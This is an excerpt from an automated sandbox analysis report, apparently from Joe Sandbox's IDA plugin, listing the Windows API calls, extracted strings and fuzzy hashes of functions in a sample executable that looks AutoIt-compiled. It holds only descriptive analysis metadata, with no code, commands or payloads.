                                                        • Instruction Fuzzy Hash: ED41E876C10229ABDF15EBA4DC959EDB7B9BF04350F548129F901B31A1EB386E04CFA4
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 00717AF3
                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00717B8F
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00717BA3
                                                        • CoCreateInstance.OLE32(0073FD08,00000000,00000001,00766E6C,?), ref: 00717BEF
                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00717C74
                                                        • CoTaskMemFree.OLE32(?,?), ref: 00717CCC
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00717D57
                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00717D7A
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00717D81
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00717DD6
                                                        • CoUninitialize.OLE32 ref: 00717DDC
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                        • String ID:
                                                        • API String ID: 2762341140-0
                                                        • Opcode ID: 0f0c8e4b51b2ded01ed399980b8bf80bc18d8b719816bd38a13d10a45bb81832
                                                        • Instruction ID: 5f2caa4b14e47d6aa8d28aec5fe113e3bb43394e212fdf976c19ac044a58aa10
                                                        • Opcode Fuzzy Hash: 0f0c8e4b51b2ded01ed399980b8bf80bc18d8b719816bd38a13d10a45bb81832
                                                        • Instruction Fuzzy Hash: DFC11D75A04109AFDB14DFA8C884DAEBBF9FF48314B148499F4169B261D734EE81CB94
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00735504
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00735515
                                                        • CharNextW.USER32(00000158), ref: 00735544
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00735585
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0073559B
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007355AC
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CharNext
                                                        • String ID:
                                                        • API String ID: 1350042424-0
                                                        • Opcode ID: e22e272857cb044f7f7160e7ab893d10d3d1b5b06c64c22bb5b08d891d5b1450
                                                        • Instruction ID: 90af93be2cb8b022c471e2b8ac513b0572b6398aff42435419e9a645adb513f4
                                                        • Opcode Fuzzy Hash: e22e272857cb044f7f7160e7ab893d10d3d1b5b06c64c22bb5b08d891d5b1450
                                                        • Instruction Fuzzy Hash: AE61AE71900608EFEF11CF54CC85EFE7BB9EB09721F108185F925AB292D7789A80DB60
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006FFAAF
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 006FFB08
                                                        • VariantInit.OLEAUT32(?), ref: 006FFB1A
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 006FFB3A
                                                        • VariantCopy.OLEAUT32(?,?), ref: 006FFB8D
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 006FFBA1
                                                        • VariantClear.OLEAUT32(?), ref: 006FFBB6
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 006FFBC3
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006FFBCC
                                                        • VariantClear.OLEAUT32(?), ref: 006FFBDE
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006FFBE9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: 20f3b729237dfad8943410177adfc1ce87c93b93e4fd8b438b8ff33ed7d79a96
                                                        • Instruction ID: e078e6f5603ad9849c64ebcb3b2633accb5d8bd4e1d682895176e0d8dcea8601
                                                        • Opcode Fuzzy Hash: 20f3b729237dfad8943410177adfc1ce87c93b93e4fd8b438b8ff33ed7d79a96
                                                        • Instruction Fuzzy Hash: 2F417F75A00219DFDB01DFA4D8549FEBBBAFF48355F008069E906A7261CB34E945CF94
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00709CA1
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00709D22
                                                        • GetKeyState.USER32(000000A0), ref: 00709D3D
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00709D57
                                                        • GetKeyState.USER32(000000A1), ref: 00709D6C
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00709D84
                                                        • GetKeyState.USER32(00000011), ref: 00709D96
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00709DAE
                                                        • GetKeyState.USER32(00000012), ref: 00709DC0
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00709DD8
                                                        • GetKeyState.USER32(0000005B), ref: 00709DEA
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 57ccbee1011ca9feea5a136210d65e4beda19bcd0e7cecbb5c325b6e9f053f87
                                                        • Instruction ID: 92f293f097615694c1789cbddde2a3241243b7a725fda32facb2519f65b7909d
                                                        • Opcode Fuzzy Hash: 57ccbee1011ca9feea5a136210d65e4beda19bcd0e7cecbb5c325b6e9f053f87
                                                        • Instruction Fuzzy Hash: 2C41B634A447C9E9FF719670C8143B6BEE06B11344F04825ADBC6566C3EBAD9DC8C7A2
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 007205BC
                                                        • inet_addr.WSOCK32(?), ref: 0072061C
                                                        • gethostbyname.WSOCK32(?), ref: 00720628
                                                        • IcmpCreateFile.IPHLPAPI ref: 00720636
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007206C6
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007206E5
                                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 007207B9
                                                        • WSACleanup.WSOCK32 ref: 007207BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: 07c4a13554d5c04062e71a3d0a9688f6684deb449f366b94091308e14c95cba0
                                                        • Instruction ID: 1f4ed49a9cb1899eae5e6b3ef855c946830810131129e30cceca05b6d3eb42ae
                                                        • Opcode Fuzzy Hash: 07c4a13554d5c04062e71a3d0a9688f6684deb449f366b94091308e14c95cba0
                                                        • Instruction Fuzzy Hash: 2891AB756042119FD720DF25D888F1ABBE1AF84318F1485A9E46A9B7A3C738ED41CFE1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharLower
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 707087890-567219261
                                                        • Opcode ID: 5cf2bd6e4291b35dc4a5bb5f31b0cb40c7a06f1654f658d833f54374f873d2f4
                                                        • Instruction ID: 06872e39c8b8560d81ce58ebde4335d04ce5b39d2afb3e38ba6e2608555a47fe
                                                        • Opcode Fuzzy Hash: 5cf2bd6e4291b35dc4a5bb5f31b0cb40c7a06f1654f658d833f54374f873d2f4
                                                        • Instruction Fuzzy Hash: 8551E331A010269BCF54DF68D8409BEB3A6BF64320B21422DE826E72C4DF3ADE40C7D1
                                                        APIs
                                                        • CoInitialize.OLE32 ref: 00723774
                                                        • CoUninitialize.OLE32 ref: 0072377F
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,0073FB78,?), ref: 007237D9
                                                        • IIDFromString.OLE32(?,?), ref: 0072384C
                                                        • VariantInit.OLEAUT32(?), ref: 007238E4
                                                        • VariantClear.OLEAUT32(?), ref: 00723936
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 636576611-1287834457
                                                        • Opcode ID: e184188807775f935faddb8ed534a2b4d80d5e057c6b105a34c638bc95bb82bd
                                                        • Instruction ID: 1f140a66f901ba3adf75d22ea42fe651205d546bb1909c302e517c8908270e66
                                                        • Opcode Fuzzy Hash: e184188807775f935faddb8ed534a2b4d80d5e057c6b105a34c638bc95bb82bd
                                                        • Instruction Fuzzy Hash: A361C0B0608311AFD711DF64D888B5AB7E4EF45715F00490DF9859B291C778EE88CBA6
                                                        APIs
                                                          • Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2
                                                          • Part of subcall function 006B912D: GetCursorPos.USER32(?), ref: 006B9141
                                                          • Part of subcall function 006B912D: ScreenToClient.USER32(00000000,?), ref: 006B915E
                                                          • Part of subcall function 006B912D: GetAsyncKeyState.USER32(00000001), ref: 006B9183
                                                          • Part of subcall function 006B912D: GetAsyncKeyState.USER32(00000002), ref: 006B919D
                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00738B6B
                                                        • ImageList_EndDrag.COMCTL32 ref: 00738B71
                                                        • ReleaseCapture.USER32 ref: 00738B77
                                                        • SetWindowTextW.USER32(?,00000000), ref: 00738C12
                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00738C25
                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00738CFF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#w
                                                        • API String ID: 1924731296-3001469106
                                                        • Opcode ID: 0c16ccef334ebce082475deef62a1ee0544b9f593a66ddb04fb9af347928bf60
                                                        • Instruction ID: b5341687aa79529d9299e683c6b4ef86a06adf6ec78cb8b5453c9d2208f437eb
                                                        • Opcode Fuzzy Hash: 0c16ccef334ebce082475deef62a1ee0544b9f593a66ddb04fb9af347928bf60
                                                        • Instruction Fuzzy Hash: DA51AB71104300AFE744EF14CC56FAA77E5FB88754F500A2DF956672A2CB38AD44CB66
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007133CF
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007133F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: LoadString$_wcslen
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 4099089115-3080491070
                                                        • Opcode ID: 591a4aed6333f18a62e87e372f139200328fa596da079aac38c48ae8216c4f2d
                                                        • Instruction ID: ed6d138c3b4ab56edce7148075b5cc6fdc3ab87c445aefb6642113da85adfdf2
                                                        • Opcode Fuzzy Hash: 591a4aed6333f18a62e87e372f139200328fa596da079aac38c48ae8216c4f2d
                                                        • Instruction Fuzzy Hash: 5F51B171900219AADF15FBE4CD46EEEB77AAF05340F208169F50572192EB392F98CF64
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharUpper
                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                        • API String ID: 1256254125-769500911
                                                        • Opcode ID: fc40188086dcc1cd9922ce4b2d55b2b762788f66d9d80785cc3666b0a53e2a3e
                                                        • Instruction ID: 89ca35bd5fff78b5340541af568d081aafcf514b034fa57b8bdb6bd6253d5a7f
                                                        • Opcode Fuzzy Hash: fc40188086dcc1cd9922ce4b2d55b2b762788f66d9d80785cc3666b0a53e2a3e
                                                        • Instruction Fuzzy Hash: B341B832A00127DBCB109F7DC9905BE77E5AFA1754B244329E421D72C4E73ADE81C790
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 007153A0
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00715416
                                                        • GetLastError.KERNEL32 ref: 00715420
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 007154A7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: 748bff583db323e255dc96ee28856e78d7bc5826458d5af7398b0d8833eee2b1
                                                        • Instruction ID: 93bb8d85a1fdda8415c42295477e62a0b07ed1eb83275ca903575777937c4282
                                                        • Opcode Fuzzy Hash: 748bff583db323e255dc96ee28856e78d7bc5826458d5af7398b0d8833eee2b1
                                                        • Instruction Fuzzy Hash: 74319175A00544DFDB15DF6CC484AEABBB4EB85305F148069E806DB292DB79DDC2CB90
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00733A9D
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00733AA0
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00733AC7
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00733AEA
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00733B62
                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00733BAC
                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00733BC7
                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00733BE2
                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00733BF6
                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00733C13
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow
                                                        • String ID:
                                                        • API String ID: 312131281-0
                                                        • Opcode ID: b40c9b3d6230b53eaee41c653c4d98b7ef231eccf5d3bd65ba042a6881c4ea3c
                                                        • Instruction ID: a11150e97f13d5b5dbf2ffd50b4b9c74b9a5fdb52fdac4bcf2b3625e6eb90e94
                                                        • Opcode Fuzzy Hash: b40c9b3d6230b53eaee41c653c4d98b7ef231eccf5d3bd65ba042a6881c4ea3c
                                                        • Instruction Fuzzy Hash: 79617D75900248AFEB20DF68CC81EEE77F8EB09710F104199FA15A7292C778AE41DF64
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 0070B151
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B165
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0070B16C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B17B
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0070B18D
                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B1A6
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B1B8
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B1FD
                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B212
                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B21D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: c19b095c3c2776c4a2e917dd6e60a45c120aa0caea465f94d01a01952b147986
                                                        • Instruction ID: a32f9a9979e26fdb766e5fdf216458563967755f0b1c92a65465791a6d0bed34
                                                        • Opcode Fuzzy Hash: c19b095c3c2776c4a2e917dd6e60a45c120aa0caea465f94d01a01952b147986
                                                        • Instruction Fuzzy Hash: 9A318F71500204FFEB119F64DD49B6D7BAABB61352F108505FA05DA290D7BC9A80CF68
                                                        APIs
                                                        • _free.LIBCMT ref: 006D2C94
                                                          • Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
                                                          • Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0
                                                        • _free.LIBCMT ref: 006D2CA0
                                                        • _free.LIBCMT ref: 006D2CAB
                                                        • _free.LIBCMT ref: 006D2CB6
                                                        • _free.LIBCMT ref: 006D2CC1
                                                        • _free.LIBCMT ref: 006D2CCC
                                                        • _free.LIBCMT ref: 006D2CD7
                                                        • _free.LIBCMT ref: 006D2CE2
                                                        • _free.LIBCMT ref: 006D2CED
                                                        • _free.LIBCMT ref: 006D2CFB
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 91aeb876b91b726c453f3214f33234a4221cc2fbec9301540820de16c16316fa
                                                        • Instruction ID: 5015f72caaf0c024dd6eaedebfbea3f59ebfa463672c92ce45f735d2a507113b
                                                        • Opcode Fuzzy Hash: 91aeb876b91b726c453f3214f33234a4221cc2fbec9301540820de16c16316fa
                                                        • Instruction Fuzzy Hash: 75111936900009BFCB42EF55D862CDC3BA6FF15740F4140AAF9485F322D631EE50AB94
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006A1459
                                                        • OleUninitialize.OLE32(?,00000000), ref: 006A14F8
                                                        • UnregisterHotKey.USER32(?), ref: 006A16DD
                                                        • DestroyWindow.USER32(?), ref: 006E24B9
                                                        • FreeLibrary.KERNEL32(?), ref: 006E251E
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006E254B
                                                        Strings
                                                        Memory Dump Source
